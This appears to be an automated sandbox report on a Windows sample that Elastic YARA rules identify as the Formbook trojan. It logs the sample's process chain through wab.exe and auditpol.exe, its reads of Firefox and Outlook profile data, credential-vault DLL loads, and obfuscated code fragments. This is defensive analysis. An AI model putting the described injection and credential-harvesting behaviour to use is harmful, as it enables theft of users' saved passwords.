Source: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.2015886760.0000000004F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.4129577177.0000000004870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@10/6@18/10

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6796

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\068f4681-e80d-4f97-9389-23d357d68730

Jump to behavior

Source: RN# D7521-RN-00353 REV-2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: RN# D7521-RN-00353 REV-2.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: auditpol.exe, 0000000A.00000002.4129063317.0000000003045000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.2193504350.0000000003045000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe

File read: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe "C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe"
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6796 -s 1020
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	Process created: C:\Windows\SysWOW64\auditpol.exe "C:\Windows\SysWOW64\auditpol.exe"
Source: C:\Windows\SysWOW64\auditpol.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	Process created: C:\Windows\SysWOW64\auditpol.exe "C:\Windows\SysWOW64\auditpol.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"			Jump to behavior

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: auditpolcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: ieframe.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: netapi32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: mlang.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: winsqlite3.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: vaultcli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: dpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	Section loaded: rasadhlp.dll			Jump to behavior

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\auditpol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: RN# D7521-RN-00353 REV-2.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: RN# D7521-RN-00353 REV-2.exe

Static file information: File size 2061855 > 1048576

Source: RN# D7521-RN-00353 REV-2.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdbRSDS source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uIklAoJgpkP.exe, 00000009.00000002.4128841533.000000000085E000.00000002.00000001.01000000.00000008.sdmp, uIklAoJgpkP.exe, 0000000B.00000000.2079950190.000000000085E000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: auditpol.pdbGCTL source: wab.exe, 00000001.00000002.2015466794.0000000002D48000.00000004.00000020.00020000.00000000.sdmp, uIklAoJgpkP.exe, 00000009.00000002.4129190903.0000000000F68000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: wntdll.pdbUGP source: wab.exe, 00000001.00000003.1924059145.0000000002A0A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000001.00000002.2015508341.0000000002FDE000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000001.00000003.1922218565.0000000002655000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.2015347638.00000000032CC000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.2017276249.0000000003476000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: wab.exe, wab.exe, 00000001.00000003.1924059145.0000000002A0A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000001.00000002.2015508341.0000000002FDE000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000001.00000003.1922218565.0000000002655000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, auditpol.exe, 0000000A.00000003.2015347638.00000000032CC000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.2017276249.0000000003476000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdbMicrosoft.VisualBasic.ni.dllMZ source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: auditpol.pdb source: wab.exe, 00000001.00000002.2015466794.0000000002D48000.00000004.00000020.00020000.00000000.sdmp, uIklAoJgpkP.exe, 00000009.00000002.4129190903.0000000000F68000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: System.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: System.Core.ni.pdb source: WERF40C.tmp.dmp.5.dr

Data Obfuscation

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Code function: 0_2_00007FFD9B8833E5 pushad ; ret		0_2_00007FFD9B8833E9
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Code function: 0_2_00007FFD9B950068 push esp; retf 4810h		0_2_00007FFD9B950312
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_004018EF push ebp; retf		1_2_004018F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_0040D0A7 pushad ; iretd		1_2_0040D0A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_004181A4 push cs; retf		1_2_004181AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_00426AE3 push edi; retf		1_2_00426AEE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_00401A89 push esp; retf		1_2_00401A8B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_00402359 push ds; retf		1_2_0040235A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_0040B35B push ebx; retf		1_2_0040B360
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_00403379 push cs; ret		1_2_0040337D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_00414BB8 push esp; iretd		1_2_00414BE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_0041855C push ds; ret		1_2_0041855D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_0040D6D4 push edx; ret		1_2_0040D6DF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_004036A0 push eax; ret		1_2_004036A2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_00415FE3 push FFFFFFF7h; retf		1_2_00415FF6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E709AD push ecx; mov dword ptr [esp], ecx		1_2_02E709B6
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036509AD push ecx; mov dword ptr [esp], ecx		10_2_036509B6
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029B2209 push ebp; retf		10_2_029B220A
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029B11F0 push esi; retf 58ACh		10_2_029B12A0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029C3437 push edi; retf		10_2_029C344B
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029C3440 push edi; retf		10_2_029C344B
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029B1515 push esp; iretd		10_2_029B153D
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029A9A04 pushad ; iretd		10_2_029A9A06
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029B4B01 push cs; retf		10_2_029B4B07
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029B2940 push FFFFFFF7h; retf		10_2_029B2953
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029B4EB9 push ds; ret		10_2_029B4EBA
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029A7CB8 push ebx; retf		10_2_029A7CBD
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029BECF0 push ebx; ret		10_2_029BED48
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_034753C8 push esp; iretd		10_2_034753C9
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0347F3D7 push B4B0ADBBh; ret		10_2_0347F3E1
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0347F2A0 push EB62C342h; iretd		10_2_0347F2A5

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
